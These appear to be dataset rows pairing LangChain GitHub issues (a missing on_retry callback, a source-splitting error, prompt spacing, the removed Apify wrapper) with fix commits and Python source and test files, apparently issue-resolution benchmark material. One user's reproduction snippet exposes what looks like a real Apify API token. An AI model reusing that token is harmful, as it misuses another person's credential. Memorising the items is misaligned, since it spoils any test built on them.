`Retrying langchain.chat_models.openai.ChatOpenAI.completion_with_retry.<locals>._completion_with_retry in 4.0 seconds as it raised APIError: Bad gateway. {"error":{"code":502,"message":"Bad gateway.","param":null,"type":"cf_bad_gateway"}} 502 {'error': {'code': 502, 'message': 'Bad gateway.', 'param': None, 'type': 'cf_bad_gateway'}} {'Date': 'Mon, 31 Jul 2023 20:24:53 GMT', 'Content-Type': 'application/json', 'Content-Length': '84', 'Connection': 'keep-alive', 'X-Frame-Options': 'SAMEORIGIN', 'Referrer-Policy': 'same-origin', 'Cache-Control': 'private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0', 'Expires': 'Thu, 01 Jan 1970 00:00:01 GMT', 'Server': 'cloudflare', 'CF-RAY': '7ef889a50eaca7f3-SYD', 'alt-svc': 'h3=":443"; ma=86400'}.
Error in OpenAICallbackHandler.on_retry callback: 'OpenAICallbackHandler' object has no attribute 'on_retry'`
![bug](https://github.com/langchain-ai/langchain/assets/43797457/9b8025e0-f486-48bb-9d74-fdaa6cef4574)
### Expected behavior
I went through the callback [documentation ](https://api.python.langchain.com/en/latest/callbacks/langchain.callbacks.openai_info.OpenAICallbackHandler.html) and yes the "on_retry" method wasn't included over there. So I guess the team needs to modify the core code for OpenAICallbackHandler because it's calling "on_retry" for some reason. | https://github.com/langchain-ai/langchain/issues/8542 | https://github.com/langchain-ai/langchain/pull/9230 | d0a0d560add6c5bc6ded60be506a87d98bf333c3 | c478fc208ed4c29e979abeb7a532eb4d01431e1b | "2023-07-31T21:01:43Z" | python | "2023-08-14T23:45:17Z" | libs/langchain/tests/unit_tests/callbacks/test_openai_info.py | import pytest
from langchain.callbacks import OpenAICallbackHandler
from langchain.llms.openai import BaseOpenAI
from langchain.schema import LLMResult
@pytest.fixture
def handler() -> OpenAICallbackHandler:
return OpenAICallbackHandler()
def test_on_llm_end(handler: OpenAICallbackHandler) -> None:
response = LLMResult(
generations=[],
llm_output={
"token_usage": {
"prompt_tokens": 2,
"completion_tokens": 1,
"total_tokens": 3,
},
"model_name": BaseOpenAI.__fields__["model_name"].default,
},
)
handler.on_llm_end(response)
assert handler.successful_requests == 1
assert handler.total_tokens == 3
assert handler.prompt_tokens == 2
assert handler.completion_tokens == 1
assert handler.total_cost > 0
def test_on_llm_end_custom_model(handler: OpenAICallbackHandler) -> None:
response = LLMResult(
generations=[],
llm_output={
"token_usage": {
"prompt_tokens": 2,
"completion_tokens": 1,
"total_tokens": 3,
},
"model_name": "foo-bar",
},
)
handler.on_llm_end(response)
assert handler.total_cost == 0
def test_on_llm_end_finetuned_model(handler: OpenAICallbackHandler) -> None:
response = LLMResult(
generations=[],
llm_output={
"token_usage": {
"prompt_tokens": 2,
"completion_tokens": 1,
"total_tokens": 3,
},
"model_name": "ada:ft-your-org:custom-model-name-2022-02-15-04-21-04",
},
)
handler.on_llm_end(response)
assert handler.total_cost > 0
@pytest.mark.parametrize(
"model_name,expected_cost",
[
("gpt-35-turbo", 0.0035),
("gpt-35-turbo-0301", 0.0035),
(
"gpt-35-turbo-0613",
0.0035,
),
(
"gpt-35-turbo-16k-0613",
0.007,
),
(
"gpt-35-turbo-16k",
0.007,
),
("gpt-4", 0.09),
("gpt-4-0314", 0.09),
("gpt-4-0613", 0.09),
("gpt-4-32k", 0.18),
("gpt-4-32k-0314", 0.18),
("gpt-4-32k-0613", 0.18),
],
)
def test_on_llm_end_azure_openai(
handler: OpenAICallbackHandler, model_name: str, expected_cost: float
) -> None:
response = LLMResult(
generations=[],
llm_output={
"token_usage": {
"prompt_tokens": 1000,
"completion_tokens": 1000,
"total_tokens": 2000,
},
"model_name": model_name,
},
)
handler.on_llm_end(response)
assert handler.total_cost == expected_cost
@pytest.mark.parametrize(
"model_name", ["gpt-35-turbo-16k-0301", "gpt-4-0301", "gpt-4-32k-0301"]
)
def test_on_llm_end_no_cost_invalid_model(
handler: OpenAICallbackHandler, model_name: str
) -> None:
response = LLMResult(
generations=[],
llm_output={
"token_usage": {
"prompt_tokens": 1000,
"completion_tokens": 1000,
"total_tokens": 2000,
},
"model_name": model_name,
},
)
handler.on_llm_end(response)
assert handler.total_cost == 0
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 7,184 | Issue: RetrievalQAWithSourcesChain gives error 'too many values to unpack (expected 2)' after running. | Hello,
I'm using _langchain_ for QA with court case documents. More specifically, the RetrievalQAWithSourcesChain to retrieve the answer and document source information. However, when running the chain with embedded documents, I get the following error:
```
ValueError: too many values to unpack (expected 2)
Traceback:
response = qa({"question": pregunta}, return_only_outputs=True)
File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\base.py", line 166, in __call__
raise e
File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\base.py", line 160, in __call__
self._call(inputs, run_manager=run_manager)
File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\qa_with_sources\base.py", line 132, in _call
answer, sources = re.split(r"SOURCES:\s", answer)
```
The passed documents are the sections from the court case. I added the following **metadata** fields:
1. Source: PDF file name.
2. Section: Name of the section
3. Section_chunk: Numeral value used for identification in case the section was divided into chunks.
4. Page: Page where the section chunk starts.
The documents are passed as retriever to the chain with FAISS (FAISS.from_documents(documents, self.embeddings)).
I tried out two approaches (both resulting in the same error):
1. providing the _load_qa_chain_ as chain
2. creating it using the class method **_.from_chain_type_**
My question is why does this error ocurrs. And also, if the type of metadata used may cause the errors.
Thank you in advance! | https://github.com/langchain-ai/langchain/issues/7184 | https://github.com/langchain-ai/langchain/pull/8716 | a3c79b1909fe1cbe85394c353b0535117ef0cdf0 | 8bebc9206fb77ee22a9b0592c1efb32f27bb45db | "2023-07-05T09:49:42Z" | python | "2023-08-16T20:30:15Z" | libs/langchain/langchain/chains/qa_with_sources/base.py | """Question answering with sources over documents."""
from __future__ import annotations
import inspect
import re
from abc import ABC, abstractmethod
from typing import Any, Dict, List, Optional
from pydantic_v1 import Extra, root_validator
from langchain.callbacks.manager import (
AsyncCallbackManagerForChainRun,
CallbackManagerForChainRun,
)
from langchain.chains import ReduceDocumentsChain
from langchain.chains.base import Chain
from langchain.chains.combine_documents.base import BaseCombineDocumentsChain
from langchain.chains.combine_documents.map_reduce import MapReduceDocumentsChain
from langchain.chains.combine_documents.stuff import StuffDocumentsChain
from langchain.chains.llm import LLMChain
from langchain.chains.qa_with_sources.loading import load_qa_with_sources_chain
from langchain.chains.qa_with_sources.map_reduce_prompt import (
COMBINE_PROMPT,
EXAMPLE_PROMPT,
QUESTION_PROMPT,
)
from langchain.docstore.document import Document
from langchain.schema import BasePromptTemplate
from langchain.schema.language_model import BaseLanguageModel
class BaseQAWithSourcesChain(Chain, ABC):
"""Question answering chain with sources over documents."""
combine_documents_chain: BaseCombineDocumentsChain
"""Chain to use to combine documents."""
question_key: str = "question" #: :meta private:
input_docs_key: str = "docs" #: :meta private:
answer_key: str = "answer" #: :meta private:
sources_answer_key: str = "sources" #: :meta private:
return_source_documents: bool = False
"""Return the source documents."""
@classmethod
def from_llm(
cls,
llm: BaseLanguageModel,
document_prompt: BasePromptTemplate = EXAMPLE_PROMPT,
question_prompt: BasePromptTemplate = QUESTION_PROMPT,
combine_prompt: BasePromptTemplate = COMBINE_PROMPT,
**kwargs: Any,
) -> BaseQAWithSourcesChain:
"""Construct the chain from an LLM."""
llm_question_chain = LLMChain(llm=llm, prompt=question_prompt)
llm_combine_chain = LLMChain(llm=llm, prompt=combine_prompt)
combine_results_chain = StuffDocumentsChain(
llm_chain=llm_combine_chain,
document_prompt=document_prompt,
document_variable_name="summaries",
)
reduce_documents_chain = ReduceDocumentsChain(
combine_documents_chain=combine_results_chain
)
combine_documents_chain = MapReduceDocumentsChain(
llm_chain=llm_question_chain,
reduce_documents_chain=reduce_documents_chain,
document_variable_name="context",
)
return cls(
combine_documents_chain=combine_documents_chain,
**kwargs,
)
@classmethod
def from_chain_type(
cls,
llm: BaseLanguageModel,
chain_type: str = "stuff",
chain_type_kwargs: Optional[dict] = None,
**kwargs: Any,
) -> BaseQAWithSourcesChain:
"""Load chain from chain type."""
_chain_kwargs = chain_type_kwargs or {}
combine_documents_chain = load_qa_with_sources_chain(
llm, chain_type=chain_type, **_chain_kwargs
)
return cls(combine_documents_chain=combine_documents_chain, **kwargs)
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
arbitrary_types_allowed = True
@property
def input_keys(self) -> List[str]:
"""Expect input key.
:meta private:
"""
return [self.question_key]
@property
def output_keys(self) -> List[str]:
"""Return output key.
:meta private:
"""
_output_keys = [self.answer_key, self.sources_answer_key]
if self.return_source_documents:
_output_keys = _output_keys + ["source_documents"]
return _output_keys
@root_validator(pre=True)
def validate_naming(cls, values: Dict) -> Dict:
"""Fix backwards compatibility in naming."""
if "combine_document_chain" in values:
values["combine_documents_chain"] = values.pop("combine_document_chain")
return values
@abstractmethod
def _get_docs(
self,
inputs: Dict[str, Any],
*,
run_manager: CallbackManagerForChainRun,
) -> List[Document]:
"""Get docs to run questioning over."""
def _call(
self,
inputs: Dict[str, Any],
run_manager: Optional[CallbackManagerForChainRun] = None,
) -> Dict[str, str]:
_run_manager = run_manager or CallbackManagerForChainRun.get_noop_manager()
accepts_run_manager = (
"run_manager" in inspect.signature(self._get_docs).parameters
)
if accepts_run_manager:
docs = self._get_docs(inputs, run_manager=_run_manager)
else:
docs = self._get_docs(inputs) # type: ignore[call-arg]
answer = self.combine_documents_chain.run(
input_documents=docs, callbacks=_run_manager.get_child(), **inputs
)
if re.search(r"SOURCES:\s", answer):
answer, sources = re.split(r"SOURCES:\s", answer)
else:
sources = ""
result: Dict[str, Any] = {
self.answer_key: answer,
self.sources_answer_key: sources,
}
if self.return_source_documents:
result["source_documents"] = docs
return result
@abstractmethod
async def _aget_docs(
self,
inputs: Dict[str, Any],
*,
run_manager: AsyncCallbackManagerForChainRun,
) -> List[Document]:
"""Get docs to run questioning over."""
async def _acall(
self,
inputs: Dict[str, Any],
run_manager: Optional[AsyncCallbackManagerForChainRun] = None,
) -> Dict[str, Any]:
_run_manager = run_manager or AsyncCallbackManagerForChainRun.get_noop_manager()
accepts_run_manager = (
"run_manager" in inspect.signature(self._aget_docs).parameters
)
if accepts_run_manager:
docs = await self._aget_docs(inputs, run_manager=_run_manager)
else:
docs = await self._aget_docs(inputs) # type: ignore[call-arg]
answer = await self.combine_documents_chain.arun(
input_documents=docs, callbacks=_run_manager.get_child(), **inputs
)
if re.search(r"SOURCES:\s", answer):
answer, sources = re.split(r"SOURCES:\s", answer)
else:
sources = ""
result: Dict[str, Any] = {
self.answer_key: answer,
self.sources_answer_key: sources,
}
if self.return_source_documents:
result["source_documents"] = docs
return result
class QAWithSourcesChain(BaseQAWithSourcesChain):
"""Question answering with sources over documents."""
input_docs_key: str = "docs" #: :meta private:
@property
def input_keys(self) -> List[str]:
"""Expect input key.
:meta private:
"""
return [self.input_docs_key, self.question_key]
def _get_docs(
self,
inputs: Dict[str, Any],
*,
run_manager: CallbackManagerForChainRun,
) -> List[Document]:
"""Get docs to run questioning over."""
return inputs.pop(self.input_docs_key)
async def _aget_docs(
self,
inputs: Dict[str, Any],
*,
run_manager: AsyncCallbackManagerForChainRun,
) -> List[Document]:
"""Get docs to run questioning over."""
return inputs.pop(self.input_docs_key)
@property
def _chain_type(self) -> str:
return "qa_with_sources_chain"
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 7,184 | Issue: RetrievalQAWithSourcesChain gives error 'too many values to unpack (expected 2)' after running. | Hello,
I'm using _langchain_ for QA with court case documents. More specifically, the RetrievalQAWithSourcesChain to retrieve the answer and document source information. However, when running the chain with embedded documents, I get the following error:
```
ValueError: too many values to unpack (expected 2)
Traceback:
response = qa({"question": pregunta}, return_only_outputs=True)
File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\base.py", line 166, in __call__
raise e
File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\base.py", line 160, in __call__
self._call(inputs, run_manager=run_manager)
File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\qa_with_sources\base.py", line 132, in _call
answer, sources = re.split(r"SOURCES:\s", answer)
```
The passed documents are the sections from the court case. I added the following **metadata** fields:
1. Source: PDF file name.
2. Section: Name of the section
3. Section_chunk: Numeral value used for identification in case the section was divided into chunks.
4. Page: Page where the section chunk starts.
The documents are passed as retriever to the chain with FAISS (FAISS.from_documents(documents, self.embeddings)).
I tried out two approaches (both resulting in the same error):
1. providing the _load_qa_chain_ as chain
2. creating it using the class method **_.from_chain_type_**
My question is why does this error ocurrs. And also, if the type of metadata used may cause the errors.
Thank you in advance! | https://github.com/langchain-ai/langchain/issues/7184 | https://github.com/langchain-ai/langchain/pull/8716 | a3c79b1909fe1cbe85394c353b0535117ef0cdf0 | 8bebc9206fb77ee22a9b0592c1efb32f27bb45db | "2023-07-05T09:49:42Z" | python | "2023-08-16T20:30:15Z" | libs/langchain/tests/unit_tests/chains/test_qa_with_sources.py | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 3,117 | Missing new lines or empty spaces in refine default prompt. | I'm not sure if it's a typo or not but the default prompt in [langchain](https://github.com/hwchase17/langchain/tree/master/langchain)/[langchain](https://github.com/hwchase17/langchain/tree/master/langchain)/[chains](https://github.com/hwchase17/langchain/tree/master/langchain/chains)/[summarize](https://github.com/hwchase17/langchain/tree/master/langchain/chains/summarize)/[refine_prompts.py](https://github.com/hwchase17/langchain/tree/master/langchain/chains/summarize/refine_prompts.py) seems to miss a empty string or a `\n `
```
REFINE_PROMPT_TMPL = (
"Your job is to produce a final summary\n"
"We have provided an existing summary up to a certain point: {existing_answer}\n"
"We have the opportunity to refine the existing summary"
"(only if needed) with some more context below.\n"
"------------\n"
"{text}\n"
"------------\n"
"Given the new context, refine the original summary"
"If the context isn't useful, return the original summary."
)
```
It will produce `refine the original summaryIf the context isn't useful` and `existing summary(only if needed)`
I could proabbly fix it with a PR ( if it's unintentionnal), but I prefer to let someone more competent to do it as i'm not used to create PR's in large projects like this. | https://github.com/langchain-ai/langchain/issues/3117 | https://github.com/langchain-ai/langchain/pull/9957 | 4b1532876710e08aa70cdd0d52b18084f85eaed3 | 29270e0378661fe3d5a77cbe95311f9d4b5d33e8 | "2023-04-18T22:32:58Z" | python | "2023-08-31T14:29:49Z" | libs/langchain/langchain/chains/question_answering/refine_prompts.py | # flake8: noqa
from langchain.chains.prompt_selector import ConditionalPromptSelector, is_chat_model
from langchain.prompts.chat import (
AIMessagePromptTemplate,
ChatPromptTemplate,
HumanMessagePromptTemplate,
SystemMessagePromptTemplate,
)
from langchain.prompts.prompt import PromptTemplate
DEFAULT_REFINE_PROMPT_TMPL = (
"The original question is as follows: {question}\n"
"We have provided an existing answer: {existing_answer}\n"
"We have the opportunity to refine the existing answer"
"(only if needed) with some more context below.\n"
"------------\n"
"{context_str}\n"
"------------\n"
"Given the new context, refine the original answer to better "
"answer the question. "
"If the context isn't useful, return the original answer."
)
DEFAULT_REFINE_PROMPT = PromptTemplate(
input_variables=["question", "existing_answer", "context_str"],
template=DEFAULT_REFINE_PROMPT_TMPL,
)
refine_template = (
"We have the opportunity to refine the existing answer"
"(only if needed) with some more context below.\n"
"------------\n"
"{context_str}\n"
"------------\n"
"Given the new context, refine the original answer to better "
"answer the question. "
"If the context isn't useful, return the original answer."
)
messages = [
HumanMessagePromptTemplate.from_template("{question}"),
AIMessagePromptTemplate.from_template("{existing_answer}"),
HumanMessagePromptTemplate.from_template(refine_template),
]
CHAT_REFINE_PROMPT = ChatPromptTemplate.from_messages(messages)
REFINE_PROMPT_SELECTOR = ConditionalPromptSelector(
default_prompt=DEFAULT_REFINE_PROMPT,
conditionals=[(is_chat_model, CHAT_REFINE_PROMPT)],
)
DEFAULT_TEXT_QA_PROMPT_TMPL = (
"Context information is below. \n"
"---------------------\n"
"{context_str}"
"\n---------------------\n"
"Given the context information and not prior knowledge, "
"answer the question: {question}\n"
)
DEFAULT_TEXT_QA_PROMPT = PromptTemplate(
input_variables=["context_str", "question"], template=DEFAULT_TEXT_QA_PROMPT_TMPL
)
chat_qa_prompt_template = (
"Context information is below. \n"
"---------------------\n"
"{context_str}"
"\n---------------------\n"
"Given the context information and not prior knowledge, "
"answer any questions"
)
messages = [
SystemMessagePromptTemplate.from_template(chat_qa_prompt_template),
HumanMessagePromptTemplate.from_template("{question}"),
]
CHAT_QUESTION_PROMPT = ChatPromptTemplate.from_messages(messages)
QUESTION_PROMPT_SELECTOR = ConditionalPromptSelector(
default_prompt=DEFAULT_TEXT_QA_PROMPT,
conditionals=[(is_chat_model, CHAT_QUESTION_PROMPT)],
)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 3,117 | Missing new lines or empty spaces in refine default prompt. | I'm not sure if it's a typo or not but the default prompt in [langchain](https://github.com/hwchase17/langchain/tree/master/langchain)/[langchain](https://github.com/hwchase17/langchain/tree/master/langchain)/[chains](https://github.com/hwchase17/langchain/tree/master/langchain/chains)/[summarize](https://github.com/hwchase17/langchain/tree/master/langchain/chains/summarize)/[refine_prompts.py](https://github.com/hwchase17/langchain/tree/master/langchain/chains/summarize/refine_prompts.py) seems to miss a empty string or a `\n `
```
REFINE_PROMPT_TMPL = (
"Your job is to produce a final summary\n"
"We have provided an existing summary up to a certain point: {existing_answer}\n"
"We have the opportunity to refine the existing summary"
"(only if needed) with some more context below.\n"
"------------\n"
"{text}\n"
"------------\n"
"Given the new context, refine the original summary"
"If the context isn't useful, return the original summary."
)
```
It will produce `refine the original summaryIf the context isn't useful` and `existing summary(only if needed)`
I could proabbly fix it with a PR ( if it's unintentionnal), but I prefer to let someone more competent to do it as i'm not used to create PR's in large projects like this. | https://github.com/langchain-ai/langchain/issues/3117 | https://github.com/langchain-ai/langchain/pull/9957 | 4b1532876710e08aa70cdd0d52b18084f85eaed3 | 29270e0378661fe3d5a77cbe95311f9d4b5d33e8 | "2023-04-18T22:32:58Z" | python | "2023-08-31T14:29:49Z" | libs/langchain/langchain/chains/summarize/refine_prompts.py | # flake8: noqa
from langchain.prompts import PromptTemplate
REFINE_PROMPT_TMPL = (
"Your job is to produce a final summary\n"
"We have provided an existing summary up to a certain point: {existing_answer}\n"
"We have the opportunity to refine the existing summary"
"(only if needed) with some more context below.\n"
"------------\n"
"{text}\n"
"------------\n"
"Given the new context, refine the original summary\n"
"If the context isn't useful, return the original summary."
)
REFINE_PROMPT = PromptTemplate(
input_variables=["existing_answer", "text"],
template=REFINE_PROMPT_TMPL,
)
prompt_template = """Write a concise summary of the following:
"{text}"
CONCISE SUMMARY:"""
PROMPT = PromptTemplate(template=prompt_template, input_variables=["text"])
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,307 | ImportError: cannot import name 'ApifyWrapper' from 'langchain.utilities' | ### System Info
Hi All,
I tried to run Apify tutorial and I ran on the issue of ImportError: cannot import name 'ApifyWrapper' from 'langchain.utilities'. I checked the Utilities library under utilities/__init__.py and I couldn't find anything under the Generic integrations with third-party systems and packages.
Any thoughts or support?
### Who can help?
@hwchase17, @agola
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
import os
openai.api_key = os.environ["OPEN_API_KEY"]
os.environ["APIFY_API_TOKEN"] = "apify_api_qNa00bcYGUYFwIZltWiOuhskmer7E61VE6GN"
apify = ApifyWrapper()
loader = apify.call_actor(
actor_id="apify/website-content-crawler",
run_input={"startUrls": [{"url": "https://python.langchain.com/en/latest/"}]},
dataset_mapping_function=lambda item: Document(
page_content=item["text"] or "", metadata={"source": item["url"]}
),
)
index = VectorstoreIndexCreator().from_loaders([loader])
query = "What is LangChain?"
result = index.query_with_sources(query)
print(result["answer"])
print(result["sources"])
### Expected behavior
LangChain is a standard interface through which you can interact with a variety of large language models (LLMs). It provides modules that can be used to build language model applications, and it also provides chains and agents with memory capabilities.
https://python.langchain.com/en/latest/modules/models/llms.html, https://python.langchain.com/en/latest/getting_started/getting_started.html | https://github.com/langchain-ai/langchain/issues/8307 | https://github.com/langchain-ai/langchain/pull/10067 | 02e51f4217207eed4fc9ac89735cf1f660be3f10 | 86646ec555970e01130994dc75f3a0c5d4e52de9 | "2023-07-26T18:18:22Z" | python | "2023-08-31T22:47:44Z" | libs/langchain/langchain/utilities/__init__.py | """**Utilities** are the integrations with third-part systems and packages.
Other LangChain classes use **Utilities** to interact with third-part systems
and packages.
"""
from langchain.utilities.alpha_vantage import AlphaVantageAPIWrapper
from langchain.utilities.arxiv import ArxivAPIWrapper
from langchain.utilities.awslambda import LambdaWrapper
from langchain.utilities.bash import BashProcess
from langchain.utilities.bibtex import BibtexparserWrapper
from langchain.utilities.bing_search import BingSearchAPIWrapper
from langchain.utilities.brave_search import BraveSearchWrapper
from langchain.utilities.duckduckgo_search import DuckDuckGoSearchAPIWrapper
from langchain.utilities.golden_query import GoldenQueryAPIWrapper
from langchain.utilities.google_places_api import GooglePlacesAPIWrapper
from langchain.utilities.google_search import GoogleSearchAPIWrapper
from langchain.utilities.google_serper import GoogleSerperAPIWrapper
from langchain.utilities.graphql import GraphQLAPIWrapper
from langchain.utilities.jira import JiraAPIWrapper
from langchain.utilities.max_compute import MaxComputeAPIWrapper
from langchain.utilities.metaphor_search import MetaphorSearchAPIWrapper
from langchain.utilities.openweathermap import OpenWeatherMapAPIWrapper
from langchain.utilities.portkey import Portkey
from langchain.utilities.powerbi import PowerBIDataset
from langchain.utilities.pubmed import PubMedAPIWrapper
from langchain.utilities.python import PythonREPL
from langchain.utilities.requests import Requests, RequestsWrapper, TextRequestsWrapper
from langchain.utilities.scenexplain import SceneXplainAPIWrapper
from langchain.utilities.searx_search import SearxSearchWrapper
from langchain.utilities.serpapi import SerpAPIWrapper
from langchain.utilities.spark_sql import SparkSQL
from langchain.utilities.sql_database import SQLDatabase
from langchain.utilities.tensorflow_datasets import TensorflowDatasets
from langchain.utilities.twilio import TwilioAPIWrapper
from langchain.utilities.wikipedia import WikipediaAPIWrapper
from langchain.utilities.wolfram_alpha import WolframAlphaAPIWrapper
from langchain.utilities.zapier import ZapierNLAWrapper
__all__ = [
"AlphaVantageAPIWrapper",
"ArxivAPIWrapper",
"BashProcess",
"BibtexparserWrapper",
"BingSearchAPIWrapper",
"BraveSearchWrapper",
"DuckDuckGoSearchAPIWrapper",
"GoldenQueryAPIWrapper",
"GooglePlacesAPIWrapper",
"GoogleSearchAPIWrapper",
"GoogleSerperAPIWrapper",
"GraphQLAPIWrapper",
"JiraAPIWrapper",
"LambdaWrapper",
"MaxComputeAPIWrapper",
"MetaphorSearchAPIWrapper",
"OpenWeatherMapAPIWrapper",
"Portkey",
"PowerBIDataset",
"PubMedAPIWrapper",
"PythonREPL",
"Requests",
"RequestsWrapper",
"SQLDatabase",
"SceneXplainAPIWrapper",
"SearxSearchWrapper",
"SerpAPIWrapper",
"SparkSQL",
"TensorflowDatasets",
"TextRequestsWrapper",
"TextRequestsWrapper",
"TwilioAPIWrapper",
"WikipediaAPIWrapper",
"WolframAlphaAPIWrapper",
"ZapierNLAWrapper",
]
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,307 | ImportError: cannot import name 'ApifyWrapper' from 'langchain.utilities' | ### System Info
Hi All,
I tried to run Apify tutorial and I ran on the issue of ImportError: cannot import name 'ApifyWrapper' from 'langchain.utilities'. I checked the Utilities library under utilities/__init__.py and I couldn't find anything under the Generic integrations with third-party systems and packages.
Any thoughts or support?
### Who can help?
@hwchase17, @agola
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
import os
openai.api_key = os.environ["OPEN_API_KEY"]
os.environ["APIFY_API_TOKEN"] = "apify_api_qNa00bcYGUYFwIZltWiOuhskmer7E61VE6GN"
apify = ApifyWrapper()
loader = apify.call_actor(
actor_id="apify/website-content-crawler",
run_input={"startUrls": [{"url": "https://python.langchain.com/en/latest/"}]},
dataset_mapping_function=lambda item: Document(
page_content=item["text"] or "", metadata={"source": item["url"]}
),
)
index = VectorstoreIndexCreator().from_loaders([loader])
query = "What is LangChain?"
result = index.query_with_sources(query)
print(result["answer"])
print(result["sources"])
### Expected behavior
LangChain is a standard interface through which you can interact with a variety of large language models (LLMs). It provides modules that can be used to build language model applications, and it also provides chains and agents with memory capabilities.
https://python.langchain.com/en/latest/modules/models/llms.html, https://python.langchain.com/en/latest/getting_started/getting_started.html | https://github.com/langchain-ai/langchain/issues/8307 | https://github.com/langchain-ai/langchain/pull/10067 | 02e51f4217207eed4fc9ac89735cf1f660be3f10 | 86646ec555970e01130994dc75f3a0c5d4e52de9 | "2023-07-26T18:18:22Z" | python | "2023-08-31T22:47:44Z" | libs/langchain/langchain/utilities/apify.py | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,201 | DOC: Apify integration missing | ### Issue with current documentation:
The Apify integration has been delete by @hwchase17 in commit aa0e69bc98fa9c77b01e5104f12b2b779f64fd33 and thus this documentation is not valid anymore:
https://python.langchain.com/docs/integrations/tools/apify
### Idea or request for content:
It would be highly beneficial to have information on a suitable replacement for the Apify integration. | https://github.com/langchain-ai/langchain/issues/8201 | https://github.com/langchain-ai/langchain/pull/10067 | 02e51f4217207eed4fc9ac89735cf1f660be3f10 | 86646ec555970e01130994dc75f3a0c5d4e52de9 | "2023-07-24T19:46:13Z" | python | "2023-08-31T22:47:44Z" | libs/langchain/langchain/utilities/__init__.py | """**Utilities** are the integrations with third-part systems and packages.
Other LangChain classes use **Utilities** to interact with third-part systems
and packages.
"""
from langchain.utilities.alpha_vantage import AlphaVantageAPIWrapper
from langchain.utilities.arxiv import ArxivAPIWrapper
from langchain.utilities.awslambda import LambdaWrapper
from langchain.utilities.bash import BashProcess
from langchain.utilities.bibtex import BibtexparserWrapper
from langchain.utilities.bing_search import BingSearchAPIWrapper
from langchain.utilities.brave_search import BraveSearchWrapper
from langchain.utilities.duckduckgo_search import DuckDuckGoSearchAPIWrapper
from langchain.utilities.golden_query import GoldenQueryAPIWrapper
from langchain.utilities.google_places_api import GooglePlacesAPIWrapper
from langchain.utilities.google_search import GoogleSearchAPIWrapper
from langchain.utilities.google_serper import GoogleSerperAPIWrapper
from langchain.utilities.graphql import GraphQLAPIWrapper
from langchain.utilities.jira import JiraAPIWrapper
from langchain.utilities.max_compute import MaxComputeAPIWrapper
from langchain.utilities.metaphor_search import MetaphorSearchAPIWrapper
from langchain.utilities.openweathermap import OpenWeatherMapAPIWrapper
from langchain.utilities.portkey import Portkey
from langchain.utilities.powerbi import PowerBIDataset
from langchain.utilities.pubmed import PubMedAPIWrapper
from langchain.utilities.python import PythonREPL
from langchain.utilities.requests import Requests, RequestsWrapper, TextRequestsWrapper
from langchain.utilities.scenexplain import SceneXplainAPIWrapper
from langchain.utilities.searx_search import SearxSearchWrapper
from langchain.utilities.serpapi import SerpAPIWrapper
from langchain.utilities.spark_sql import SparkSQL
from langchain.utilities.sql_database import SQLDatabase
from langchain.utilities.tensorflow_datasets import TensorflowDatasets
from langchain.utilities.twilio import TwilioAPIWrapper
from langchain.utilities.wikipedia import WikipediaAPIWrapper
from langchain.utilities.wolfram_alpha import WolframAlphaAPIWrapper
from langchain.utilities.zapier import ZapierNLAWrapper
__all__ = [
"AlphaVantageAPIWrapper",
"ArxivAPIWrapper",
"BashProcess",
"BibtexparserWrapper",
"BingSearchAPIWrapper",
"BraveSearchWrapper",
"DuckDuckGoSearchAPIWrapper",
"GoldenQueryAPIWrapper",
"GooglePlacesAPIWrapper",
"GoogleSearchAPIWrapper",
"GoogleSerperAPIWrapper",
"GraphQLAPIWrapper",
"JiraAPIWrapper",
"LambdaWrapper",
"MaxComputeAPIWrapper",
"MetaphorSearchAPIWrapper",
"OpenWeatherMapAPIWrapper",
"Portkey",
"PowerBIDataset",
"PubMedAPIWrapper",
"PythonREPL",
"Requests",
"RequestsWrapper",
"SQLDatabase",
"SceneXplainAPIWrapper",
"SearxSearchWrapper",
"SerpAPIWrapper",
"SparkSQL",
"TensorflowDatasets",
"TextRequestsWrapper",
"TextRequestsWrapper",
"TwilioAPIWrapper",
"WikipediaAPIWrapper",
"WolframAlphaAPIWrapper",
"ZapierNLAWrapper",
]
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,201 | DOC: Apify integration missing | ### Issue with current documentation:
The Apify integration has been delete by @hwchase17 in commit aa0e69bc98fa9c77b01e5104f12b2b779f64fd33 and thus this documentation is not valid anymore:
https://python.langchain.com/docs/integrations/tools/apify
### Idea or request for content:
It would be highly beneficial to have information on a suitable replacement for the Apify integration. | https://github.com/langchain-ai/langchain/issues/8201 | https://github.com/langchain-ai/langchain/pull/10067 | 02e51f4217207eed4fc9ac89735cf1f660be3f10 | 86646ec555970e01130994dc75f3a0c5d4e52de9 | "2023-07-24T19:46:13Z" | python | "2023-08-31T22:47:44Z" | libs/langchain/langchain/utilities/apify.py | |
